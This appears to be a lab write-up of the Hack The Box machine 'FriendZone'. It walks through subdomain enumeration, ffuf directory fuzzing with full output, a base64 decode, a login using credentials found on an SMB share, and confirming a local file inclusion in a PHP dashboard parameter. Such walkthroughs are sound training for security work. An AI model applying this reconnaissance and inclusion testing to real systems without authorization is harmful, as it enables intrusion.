Web
Nmap discovered a web server running on the target port 80
The service is Apache httpd 2.4.29 over SSL
The enumerated SSL certificate had a CN associated with what appears to be a domain
Appended to the /etc/hosts file on Kali for local DNS resolution
DNS
After structuring those two domain zones (friendzone.red and friendzoneportal.red) and their sub-domains, I realized that none of those are designed for HTTP, but HTTPS.
In fact, the apache http service on the target port 80 is being used as a proxy to here at the port 443 given the fact the requested resource is indeed legit and available.
friendzone.red
The webroot of friendzone.red over HTTPS finally shows something other than the base web root image.
This meme indicates that the other domain zone (friendzoneportal.red) may contains something critical to this operation
The source code points out that the /js/js directory contains some development stuff
friendzone.red/js/js
The /js/js directory reveals that the developer is testing some functions along with what appears to be a base64 string
The source code has a very ambiguous comment
┌──(kali㉿kali)-[~/archive/htb/labs/friendzone]
└─$ echo 'RnNZV3lsYW9QSzE2NzQ3MDQ2MjRJdWJqa3JRN3dP' | base64 -d
FsYWylaoPK1674704624IubjkrQ7wO
┌──(kali㉿kali)-[~/archive/htb/labs/friendzone]
└─$ echo 'RnNZV3lsYW9QSzE2NzQ3MDQ2MjRJdWJqa3JRN3dP' | base64 -d | base64 -d
��V�<�z��㭸"�㒴;�base64: invalid inputAttempting to decode it doesn’t result anything. I don’t know what this string is for now, but I will keep it in the back of my mind
fuzzing
┌──(kali㉿kali)-[~/…/htb/labs/friendzone/smb]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/web-content/directory-list-2.3-medium.txt -u https://friendzone.red:443/FUZZ -ic -e .txt,.php,.html
________________________________________________
:: Method : GET
:: URL : https://friendzone.red:443/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [status: 200, Size: 238, Words: 23, Lines: 15, Duration: 27ms]
admin [status: 301, Size: 318, Words: 20, Lines: 10, Duration: 27ms]
js [status: 301, Size: 315, Words: 20, Lines: 10, Duration: 26ms]Fuzzing the web root reveals 2 directories. The /js/ directory is already known from the comment, but the /admin/ is new.
friendzone.red/admin/
There is directory indexing at the /admin/ directory, but it’s empty.
friendzone.red/js/
The /js/ directory only has the other sub-directory, /js/js/, which was revealed from the comment
administrator1.friendzone.red
It’s a login page at administrator1.friendzone.red over HTTPS
Testing out weak/default credentials fails. I got re-directed to /login.php and it says Wrong!
Trying the credential that I got from the SMB share earlier.
It worked! and it points to /dashboard.php
Before heading over to /dashboard.php, I will fuzz the web root to get an idea of how it is structured.
Fuzzing
┌──(kali㉿kali)-[~/…/htb/labs/friendzone/smb]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/web-content/directory-list-2.3-medium.txt -u https://administrator1.friendzone.red:443/FUZZ -ic -e .txt,.php,.html
________________________________________________
:: Method : GET
:: URL : https://administrator1.friendzone.red:443/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [status: 200, Size: 2873, Words: 393, Lines: 123, Duration: 29ms]
images [status: 301, Size: 349, Words: 20, Lines: 10, Duration: 28ms]
login.php [status: 200, Size: 7, Words: 2, Lines: 1, Duration: 31ms]
dashboard.php [status: 200, Size: 101, Words: 12, Lines: 1, Duration: 32ms]
timestamp.php [status: 200, Size: 36, Words: 5, Lines: 1, Duration: 29ms]
:: Progress: [882188/882188] :: Job [1/1] :: 1226 req/sec :: Duration: [0:23:12] :: Errors: 0 ::ffuf found a directory and 3 of PHP files
administrator1.friendzone.red/dashboard.php
The /dashboard.php file appears to be a PHP application written by a beginner dev
It shows that image_name parameter is missed and requests to enter it to show the image
It also points out that the default is image_id=a.jpg&pagename=timestamp
So image_id and pagename are the actual parameters
That looks like it could be abused for LFI
The Inclusion
Supplying image_id=a.jpg&pagename=timestamp indeed included the a.jpg file and whatever is in the timestamp as shown as Final Access timestamp is 1674710768
My guess is that
- The
image_idparameter are already configured with the/images/directory to include from - The
pagenameparameter already has the.phpsuffix to it
administrator1.friendzone.red/timestamp.php
Yeap.
There is a file named, timestamp.php, which was also enumerated from fuzzing earlier
So this means that that pagename parameter is executing PHP codes.
pagename alone
Funny thing is that if I don’t supply the image_id parameter, it doesn’t work.
I guess that is what it meant by “image_name param is missed !”
It would mean that image_id parameter must be supplied.
image_id alone
While I am unable to load a PHP page with the pagename parameter without supplying the image_id parameter, I can still load images with the image_id parameter without supplying pagename parameter. That isb.jpg. Author’s got jokes
LFI
The default that it says here is giving out 2 parameters
One is image_id, and the other one is pagename
• theimage_id parameter is likely using the php include() function to call the file a.jpg from the pre-assigned directory; /images/
○ But the image_id parameter doesn’t appear to be vulnerable to the LFI/RFI as I have fuzzed it
• the pagename parameter is also using the php include() function with a pre-assigned extension (.php) to it
Just to confirm, I will try loading other PHP file through the pagename parameter
I tried loading the dashboard.php file, but it just hangs.
This doesn’t mean that LFI is failed. It’s likely working but it doesn’t load for some reason.
Now what if I supply other PHP script to the pagename parameter?
I remember that Wrong ! from the login.php file when I failed to authenticate
LFI confirmed!
I will continue enumerating other sub-domains
hr.friendzone.red
hr.friendzone.red over HTTPS is empty
uploads.friendzone.red
The web root of uploads.friendzone.red over HTTPS is a file upload page
I got a strong feeling that this page is vulnerable to arbitrary file upload after confirming the LFI earlier
I will upload a test file
It sends out a POST request to the /upload.php file along with the data
The confirmation contains a string of digits. Is it re-naming the uploaded file?
Fuzzing
┌──(kali㉿kali)-[~/…/htb/labs/friendzone/smb]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://uploads.friendzone.red:443/FUZZ -ic -e .txt,.php,.html
________________________________________________
:: Method : GET
:: URL : https://uploads.friendzone.red:443/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 391, Words: 42, Lines: 14, Duration: 28ms]
files [Status: 301, Size: 334, Words: 20, Lines: 10, Duration: 30ms]
upload.php [Status: 200, Size: 38, Words: 8, Lines: 1, Duration: 31ms]There is the /files/ directory
uploads.friendzone.red/files/
The /files/ directory is just empty
I get a 404 if I append that string of digits from the upload confirmation.
That was not a renamed filename of the uploaded file
Fuzzing
┌──(kali㉿kali)-[~/…/htb/labs/friendzone/smb]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://uploads.friendzone.red:443/files/FUZZ -ic -e .txt,.php,.html
________________________________________________
:: Method : GET
:: URL : https://uploads.friendzone.red:443/files/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 29ms]
note [Status: 200, Size: 20, Words: 3, Lines: 2, Duration: 238ms]Fuzzing the /files/ directory reveals a file within, /files/note
uploads.friendzone.red/files/note
It says that it’s under development.
So I guess it’s deadend
Moving on
friendzoneportal.red
Zone Transferred!
Fuzzing
┌──(kali㉿kali)-[~/…/htb/labs/friendzone/smb]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/web-content/directory-list-2.3-medium.txt -u https://friendzoneportal.red:443/FUZZ -ic -e .txt,.php,.html
________________________________________________
:: Method : GET
:: URL : https://friendzoneportal.red:443/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [status: 200, Size: 66, Words: 5, Lines: 6, Duration: 27ms]ffuf found nothing.
admin.friendzoneportal.red
admin.friendzoneportal.red over HTTPS is a login page
Fuzzing
┌──(kali㉿kali)-[~/…/htb/labs/friendzone/smb]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/web-content/directory-list-2.3-medium.txt -u https://admin.friendzoneportal.red:443/FUZZ -ic -e .txt,.php,.html
________________________________________________
:: Method : GET
:: URL : https://admin.friendzoneportal.red:443/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [status: 200, Size: 379, Words: 23, Lines: 18, Duration: 27ms]
login.php [status: 200, Size: 7, Words: 1, Lines: 1, Duration: 30ms]ffuf found a new file; login.php
admin.friendzoneportal.red/login.php
It says that the page isn’t developed.
files.friendzoneportal.red
It’s empty
imports.friendzoneportal.red
It’s empty as well
vpn.friendzoneportal.red
It’s also empty